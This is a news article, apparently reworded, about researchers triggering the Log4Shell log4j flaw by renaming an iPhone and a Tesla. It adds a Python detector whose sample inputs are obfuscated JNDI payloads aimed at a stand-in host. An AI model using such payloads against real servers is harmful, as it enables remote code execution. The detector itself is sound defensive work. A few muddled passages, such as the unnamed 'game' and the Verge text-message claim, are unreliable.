Researchers trigger new exploit by renaming an iPhone and a Tesla


The Log4Shell exploit has been used on a variety of devices, according to security researchers. Changing the device name of an Apple or Tesla device to a special exploit string was enough to cause a ping from the server at the other end, indicating that it was vulnerable to Log4Shell.

Researchers changed the device names to a string of characters that would send the server to a testing URL, exploiting the vulnerability. After the name was changed, incoming traffic showed URL requests from Apple and China Unicom, the company's mobile service partner for the Chinese market. The researchers tricked the Apple and Tesla servers into visiting a URL.


The screen with the name changed contained the exploit string.

The image is by Cas van Cooten.

The Dutch security researcher who gave the demonstration for the iPhone uploaded it to the Log4jAttackSurface GitHub repository.

If the images are genuine, they show behavior that should not be possible with text in a device name. This proof of concept has led to widespread reporting that Apple and other companies are vulnerable.

It is not clear how useful the demonstration would be. An attacker could host malicious code at the target URL in order to get to a vulnerable server, but a well-maintained network could prevent such an attack at the network level. There is no indication that the method could lead to a broader compromise of Apple's or Tesla's systems. Neither company responded to an email request for comment.


It is a reminder of the complex nature of technological systems, which almost always depend on code pulled in from third-party libraries. The Log4Shell exploit affects an open-source Java tool called log4j, which is widely used for application event logging. Researchers estimate that the number of affected systems is in the millions, including obscure systems that are rarely targeted by attacks of this nature.

The full extent of exploitation in the wild is unknown, but in a post on its website, Cado reported detecting servers trying to use this method to install Mirai botnet code.

The situation is more serious because Log4Shell is easy to exploit. The vulnerability works by tricking the application into interpreting a piece of text as a link to a remote resource, and then trying to retrieve that resource instead of saving the text as it is written. For this to happen, a vulnerable device has to record a special string of characters in its application logs.

The message text can be stored in the logs, which creates a potential vulnerability in systems that accept user input. The log4j vulnerability was first spotted in the server of the game, which attackers could compromise using chat messages.
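As an added example (not from the article or the researchers), the Python sketch below checks user-controlled fields such as a device name or chat message for a Log4j JNDI lookup before they are logged, including lookups assembled from nested `${...}` expressions. The field names, sample values and the `example.invalid` host are constructed, and the substitution rules are an approximation of Log4j's behaviour.

```python
import re

# Innermost ${...} lookup: one that contains no nested "${" of its own.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Log4j lower-cases the lookup prefix, so match it case-insensitively.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _collapse(match):
    """Approximate what Log4j substitutes for a non-JNDI lookup."""
    body = match.group(1)
    if ":-" in body:  # ${name:-default} falls back to the default text
        return body.split(":-", 1)[1]
    prefix, _, value = body.partition(":")
    if prefix.lower() == "lower":
        return value.lower()
    if prefix.lower() == "upper":
        return value.upper()
    return ""  # env/sys/date and so on: value is not knowable offline


def contains_jndi_lookup(text, max_passes=8):
    """True if text holds a JNDI lookup, directly or built from nested lookups."""
    for _ in range(max_passes):
        if _JNDI.search(text):
            return True
        collapsed = _INNER.sub(_collapse, text)
        if collapsed == text:
            return False
        text = collapsed
    return True  # still changing after max_passes: treat as suspicious


def flag_fields(records):
    """Return the (field, value) pairs that should not reach the logger as-is."""
    return [(f, v) for f, v in records if contains_jndi_lookup(v)]


# Constructed sample input: user-controlled fields like those in the article.
SAMPLES = [
    ("device_name", "Anna's iPhone"),
    ("device_name", "${jndi:ldap://callback.example.invalid/a}"),
    ("chat_message", "hello ${${lower:J}ndi:ldap://callback.example.invalid/a}"),
    ("sms_body", "${${::-j}${::-n}${::-d}${::-i}:dns://callback.example.invalid}"),
    ("chat_message", "price is ${amount} today"),
]

if __name__ == "__main__":
    for field, value in flag_fields(SAMPLES):
        print(f"ALERT {field}: {value!r}")
```

A check like this is a detection aid for logs and input pipelines; it does not replace updating the log4j library.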

Testing conducted by The Verge shows that at least one major provider is vulnerable to the exploit. The server of the company that operates the number that the text messages were sent to could be tricked into executing malicious code if the information about the host name and address was revealed. At the time of publication, calls and emails to the company were not answered.

Patching all vulnerable machines will take time given the challenges of updating enterprise software at scale, but an update to the log4j library has been released to mitigate the vulnerability.